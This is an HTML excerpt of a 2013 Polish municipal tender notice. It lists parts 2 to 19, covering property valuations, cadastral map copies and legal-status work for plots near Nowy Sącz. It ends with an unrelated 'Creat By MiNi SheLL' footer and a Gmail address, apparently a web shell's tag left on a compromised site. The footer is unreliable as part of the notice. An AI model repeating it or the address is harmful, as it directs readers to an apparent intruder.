<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie operatu szacunkowego określającego wartość nieruchomości położonych na terenie miasta Nowego Sącza i Powiatu Nowosądeckiego - dla potrzeb ustalenia wysokości odszkodowania należnego byłym właścicielom nieruchomości przejętych w trybie art.12 ust.4 pkt 2 ustawy z dnia 10.04.2003r. O szczególnych zasadach przygotowania i realizacji inwestycji  w zakresie dróg publicznych. 
Dla każdej nieruchomości należy sporządzić oddzielny operat.
Jeden operat może obejmować więcej niż 1 działkę objętą tą samą księgą wieczystą.
Podać cenę brutto.
Maksymalna liczba planowanych operatów - 53, minimalna - 34.
Termin wykonania zamówienia - 3 tygodnie licząc od dnia doręczenia wykonawcy zlecenia. Zlecenia zostaną dostarczone nie później niż do dnia 12.11.2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie operatu szacunkowego określającego wartość niezabudowanej nieruchomości, stanowiącej własność Gminy Krynica, położonej w obr. Krynica-Zdrój m. Krynica-Zdrój, oznaczonej jako działka ewid. nr 1620/2 o pow.0,0171ha (poprzednio działka poscaleniowa 397 w gm. kat. Krynica-Zdrój), wg. stanu na datę wywłaszczenia i zwrotu - w celu rozliczenia odszkodowania z tytułu zwrotu wywłaszczonej nieruchomości. Odszkodowanie z tytułu wywłaszczenia obejmowało grunt i drzewostan.
Podać cenę brutto.
Termin wykonania:1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działka ewid. nr 409/5 o  pow.0,12ha, położona w Mochnaczce Wyżnej gm. Krynica-Zdrój, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym  - dla potrzeb aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działka ewid. nr 235/2 o  pow.0,0843ha, położona w obr. Krynica-Wieś m. Krynica-Zdrój, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym  - dla potrzeb aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej Skarbu Państwa nr 373/13 o pow. 5,20 ha położonej w obrębie ewidencyjnym Popardowa gm. Nawojowa - w części oznaczonej na załączniku graficznym obejmującej teren położony poza korytem cieku wodnego -  wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości - dla potrzeb regulacji stanu prawnego nieruchomości
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto:
Termin wykonania:1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej nr 298/4, położonej w Obr. Nawojowa, tylko w części dotyczącej pgr 2018, z zaznaczeniem jej przebiegu na wyrysie z mapy ewidencyjnej.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> CZĘŚĆ 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza stanu prawnego nieruchomości Skarbu Państwa obj. Kw NS1S/00002134/5- Marcinkowice gm. Chełmiec, z wykonaniem wykazu zmian gruntowych oraz kopii map ewidencyjnych połączonych ze skompletowaniem dokumentacji będącej podstawą zmiany oznaczenia w księdze wieczystej dla w/w nieruchomości.
 Księga obejmuje 3 parcele o łącznej powierzchni 0,3195  ha
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> CZĘŚĆ 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza stanu prawnego nieruchomości Skarbu Państwa obj. Kw NS1G/00022506/9 - Stróże gm. Grybów, z wykonaniem wykazu zmian gruntowych oraz kopii map ewidencyjnych połączonych  ze skompletowaniem dokumentacji będącej podstawą zmiany oznaczenia w księdze wieczystej dla w/w nieruchomości, oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych objętych pozycją rejestrową nr 13 operatu ewidencji gruntów dla obr. Stróże gm. Grybów wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Księga obejmuje 7 parcel (działek) o łącznej powierzchni 3,6055 ha
W rejestrze uwidocznionych jest 7 działek ewidencyjnych o łącznej powierzchni 0,7020 ha
Opracowanie należy sporządzić  w 3 egzemplarzach oraz w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> CZĘŚĆ 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych w skład których wchodzą pgr nr 1374/50, 1374/51, 1374/16, 1377, 1374/6 objęte Lwh 364- gm. kat. Bartkowa, wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> CZĘŚĆ 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych nr 460 i 523 o łącznej pow.0,1463 ha, położonych w obr. 1 miasta Grybowa, wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla ww. nieruchomości.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> CZĘŚĆ 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej nr 168/1 o pow. 0,02 ha położonej w obrębie Florynka gm. Grybów, wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> CZĘŚĆ 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uzupełnienie wykazu nieruchomości Skarbu Państwa dla celów realizacji ustawy z dnia 07 września 2007 r. o ujawnieniu w księgach wieczystych prawa własności nieruchomości Skarbu Państwa oraz jednostek samorządu terytorialnego dla 42 działek ewidencyjnych położonych w gminie Chełmiec w obrębach: Biczyce Dolne, Chełmiec, Dąbrowa, Kunów, Marcinkowice, Niskowa, Świniarsko, Wielopole o dane wieczysto - księgowe dla w/w działek zgodnie z tabelą prowadzoną przez Wydział Geodezji i Budownictwa. W przypadku rozbieżności w oznaczeniu działek pomiędzy stanem w ewidencji gruntów w Lwh/KW należy wykonać  kopię mapy ewidencyjnej z wykazem zmian gruntowych.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> CZĘŚĆ 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uzupełnienie wykazu nieruchomości Skarbu Państwa dla celów realizacji ustawy z dnia 07 września 2007 r. o ujawnieniu w księgach wieczystych prawa własności nieruchomości Skarbu Państwa oraz jednostek samorządu terytorialnego dla 24 działek ewidencyjnych położonych w gminie Gródek nad Dunajcem w obrębach: Bartkowa Posadowa, Bujne, Jelna, Podole Górowa, Przydonica, Roztoka Brzeziny o dane wieczysto - księgowe dla w/w działek zgodnie z tabelą prowadzoną przez Wydział Geodezji i Budownictwa. W przypadku rozbieżności w oznaczeniu działek pomiędzy stanem w ewidencji gruntów w Lwh/KW należy wykonać  kopię mapy ewidencyjnej z wykazem zmian gruntowych.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> CZĘŚĆ 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uzupełnienie wykazu nieruchomości Skarbu Państwa dla celów realizacji ustawy z dnia 07 września 2007 r. o ujawnieniu w księgach wieczystych prawa własności nieruchomości Skarbu Państwa oraz jednostek samorządu terytorialnego dla 42 działek ewidencyjnych położonych  w obrębie Biała Niżna gmina Grybów o dane wieczysto - księgowe dla w/w działek zgodnie z tabelą prowadzoną przez Wydział Geodezji i Budownictwa. W przypadku rozbieżności w oznaczeniu działek pomiędzy stanem w ewidencji gruntów w Lwh/KW należy wykonać  kopię mapy ewidencyjnej z wykazem zmian gruntowych.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> CZĘŚĆ 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych nr 229/1 i 229/2 o łącznej pow.  8,5589 ha położonych w obr. Frycowa  gm. Nawojowa - stanowiących pas drogowy drogi krajowej nr 75 Brzesko- Krynica. W przypadku posiadanych przez Wydział Geodezji i Budownictwa  prawomocnych decyzji wywłaszczeniowych należy sporządzić dokumentację będącą podstawą ujawnienia decyzji w księdze wieczystej. 
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> CZĘŚĆ 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych nr 62 i 119 o łącznej pow.  7,62 ha położonych w obr. Maciejowa  gm. Łabowa - stanowiących pas drogowy drogi krajowej nr 75 Brzesko- Krynica. W przypadku posiadanych przez Wydział Geodezji i Budownictwa prawomocnych decyzji wywłaszczeniowych należy sporządzić dokumentację będącą podstawą ujawnienia decyzji w księdze wieczystej. 
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> CZĘŚĆ 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych nr 201, 305 i 393 o łącznej pow.  10,23 ha położonych w obr. Łabowa  gm. Łabowa - stanowiących pas drogowy drogi krajowej nr 75 Brzesko- Krynica. W przypadku posiadanych przez Wydział Geodezji i Budownictwa prawomocnych decyzji wywłaszczeniowych należy sporządzić dokumentację będącą podstawą ujawnienia decyzji w księdze wieczystej. 
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> CZĘŚĆ 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Geodezyjny podział  nieruchomości położonej w obr. 109 m. Nowego Sącza, oznaczonej jako działka nr 644, stanowiącej własność Miasta Nowy Sącz, mający na celu wydzielenie wywłaszczonej dz. nr 205/14 - do celów zwrotu wywłaszczonej nieruchomości.  
Podać cenę brutto.
Termin wykonania: 29 listopad 2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com